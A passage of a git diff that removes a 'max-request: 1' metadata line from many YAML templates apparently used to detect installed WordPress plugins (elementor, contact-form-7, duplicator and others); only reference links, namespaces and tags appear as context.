     - https://wordpress.org/plugins/better-wp-security/
   metadata:
-    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 7631e87d78..00e95c4263 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
-    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index c7daa26ac6..212b2b13c4 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
-    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 68767e4dce..6318392c5c 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
-    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index 073618936d..e1a2a186e0 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
-    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 6aabc19e9f..23614882a7 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
-    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index ac80e4f31b..85965337cb 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
-    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 15d7a24755..33d903a1b4 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
-    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 40ccc15b27..3c6f8f287b 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
-    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index 1fad3cee08..c3b630cde2 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
-    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index ebe4ee41a7..5c8ce709b6 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
-    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index 5c32110e0e..aea47b9e84 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
-    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 09c2e2f360..78c584c388 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
-    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 1a2e8beb3e..2c80d09c27 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/complianz-gdpr/
   metadata:
-    max-request: 1
     plugin_namespace: complianz-gdpr
     wpscan: https://wpscan.com/plugin/complianz-gdpr
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 706145493c..4b1b3a8754 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7-honeypot/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7-honeypot
     wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index cf6a6ee635..06ad83bdf7 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-7
     wpscan: https://wpscan.com/plugin/contact-form-7
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index c039765929..b20666268f 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/contact-form-cfdb7/
   metadata:
-    max-request: 1
     plugin_namespace: contact-form-cfdb7
     wpscan: https://wpscan.com/plugin/contact-form-cfdb7
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index a2c92dff4b..b2a097bfe7 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-law-info/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-law-info
     wpscan: https://wpscan.com/plugin/cookie-law-info
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index 41b5d6c854..c71fa258af 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/cookie-notice/
   metadata:
-    max-request: 1
     plugin_namespace: cookie-notice
     wpscan: https://wpscan.com/plugin/cookie-notice
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index cca31cc3a9..5a98e67597 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creame-whatsapp-me/
   metadata:
-    max-request: 1
     plugin_namespace: creame-whatsapp-me
     wpscan: https://wpscan.com/plugin/creame-whatsapp-me
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index ff9c0a49ce..4463174203 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/creative-mail-by-constant-contact/
   metadata:
-    max-request: 1
     plugin_namespace: creative-mail-by-constant-contact
     wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index a76d3306bb..cfac0b961b 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-css-js/
   metadata:
-    max-request: 1
     plugin_namespace: custom-css-js
     wpscan: https://wpscan.com/plugin/custom-css-js
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 2249681b6d..846761f2f7 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-fonts/
   metadata:
-    max-request: 1
     plugin_namespace: custom-fonts
     wpscan: https://wpscan.com/plugin/custom-fonts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index b5389b27c9..0def6e61ca 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/custom-post-type-ui/
   metadata:
-    max-request: 1
     plugin_namespace: custom-post-type-ui
     wpscan: https://wpscan.com/plugin/custom-post-type-ui
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 00d183f507..5c5decc127 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-comments/
   metadata:
-    max-request: 1
     plugin_namespace: disable-comments
     wpscan: https://wpscan.com/plugin/disable-comments
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index 451e1daef1..a8229a338e 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/disable-gutenberg/
   metadata:
-    max-request: 1
     plugin_namespace: disable-gutenberg
     wpscan: https://wpscan.com/plugin/disable-gutenberg
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index af30ca76b6..6559e64dce 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-page/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-page
     wpscan: https://wpscan.com/plugin/duplicate-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index 93823466d4..a4368b8aa6 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicate-post/
   metadata:
-    max-request: 1
     plugin_namespace: duplicate-post
     wpscan: https://wpscan.com/plugin/duplicate-post
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index e224283ecd..ec119e762a 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duplicator/
   metadata:
-    max-request: 1
     plugin_namespace: duplicator
     wpscan: https://wpscan.com/plugin/duplicator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index 9af8df08a7..b7ec7576a3 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/duracelltomi-google-tag-manager/
   metadata:
-    max-request: 1
     plugin_namespace: duracelltomi-google-tag-manager
     wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index d4081474c3..c42d679973 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-fancybox/
   metadata:
-    max-request: 1
     plugin_namespace: easy-fancybox
     wpscan: https://wpscan.com/plugin/easy-fancybox
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index bcbc0707fb..fc44375947 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-table-of-contents/
   metadata:
-    max-request: 1
     plugin_namespace: easy-table-of-contents
     wpscan: https://wpscan.com/plugin/easy-table-of-contents
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index 8b23832297..a1616c1741 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/easy-wp-smtp/
   metadata:
-    max-request: 1
     plugin_namespace: easy-wp-smtp
     wpscan: https://wpscan.com/plugin/easy-wp-smtp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index f0c3e4bc63..6cfb8bc272 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementor/
   metadata:
-    max-request: 1
     plugin_namespace: elementor
     wpscan: https://wpscan.com/plugin/elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index eab4a0d725..9caaa53263 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/elementskit-lite/
   metadata:
-    max-request: 1
     plugin_namespace: elementskit-lite
     wpscan: https://wpscan.com/plugin/elementskit-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 74c172ac94..5e6b557952 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/enable-media-replace/
   metadata:
-    max-request: 1
     plugin_namespace: enable-media-replace
     wpscan: https://wpscan.com/plugin/enable-media-replace
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index f5a63a2ed2..c5a665e6f7 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/envato-elements/
   metadata:
-    max-request: 1
     plugin_namespace: envato-elements
     wpscan: https://wpscan.com/plugin/envato-elements
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index 25ca7328ef..a8b56b5df0 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/essential-addons-for-elementor-lite/
   metadata:
-    max-request: 1
     plugin_namespace: essential-addons-for-elementor-lite
     wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index cb1db5bee6..4e20e57107 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ewww-image-optimizer/
   metadata:
-    max-request: 1
     plugin_namespace: ewww-image-optimizer
     wpscan: https://wpscan.com/plugin/ewww-image-optimizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index a3207ea16a..6f6a416595 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/facebook-for-woocommerce/
   metadata:
-    max-request: 1
     plugin_namespace: facebook-for-woocommerce
     wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2a4b772078..2dd0ef57b5 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fast-indexing-api/
   metadata:
-    max-request: 1
     plugin_namespace: fast-indexing-api
     wpscan: https://wpscan.com/plugin/fast-indexing-api
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 366205085d..11942f4fa4 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/favicon-by-realfavicongenerator/
   metadata:
-    max-request: 1
     plugin_namespace: favicon-by-realfavicongenerator
     wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 598f08ce88..87c2aeb4bd 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/flamingo/
   metadata:
-    max-request: 1
     plugin_namespace: flamingo
     wpscan: https://wpscan.com/plugin/flamingo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 42cdfb4475..3696eefbf7 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/fluentform/
   metadata:
-    max-request: 1
     plugin_namespace: fluentform
     wpscan: https://wpscan.com/plugin/fluentform
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index a1af263dbd..8bab0a9c3e 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/font-awesome/
   metadata:
-    max-request: 1
     plugin_namespace: font-awesome
     wpscan: https://wpscan.com/plugin/font-awesome
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index 19265f910e..affd270123 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/force-regenerate-thumbnails/
   metadata:
-    max-request: 1
     plugin_namespace: force-regenerate-thumbnails
     wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index c21d414695..1e6a62e23b 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/formidable/
   metadata:
-    max-request: 1
     plugin_namespace: formidable
     wpscan: https://wpscan.com/plugin/formidable
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 91c89d0ad8..980265f531 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
-    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index 539d9f7cec..daf205789d 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
-    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index f4123bb594..22bfa3ffe2 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
-    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 254f916291..7ed171d662 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index 8074ac337e..ad238445fc 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
-    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index b9de0ee313..7161671960 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
-    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 7b0f188ff7..2678f603c6 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,7 +7,6 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
-    max-request: 1
     plugin_namespace: google-site-kit
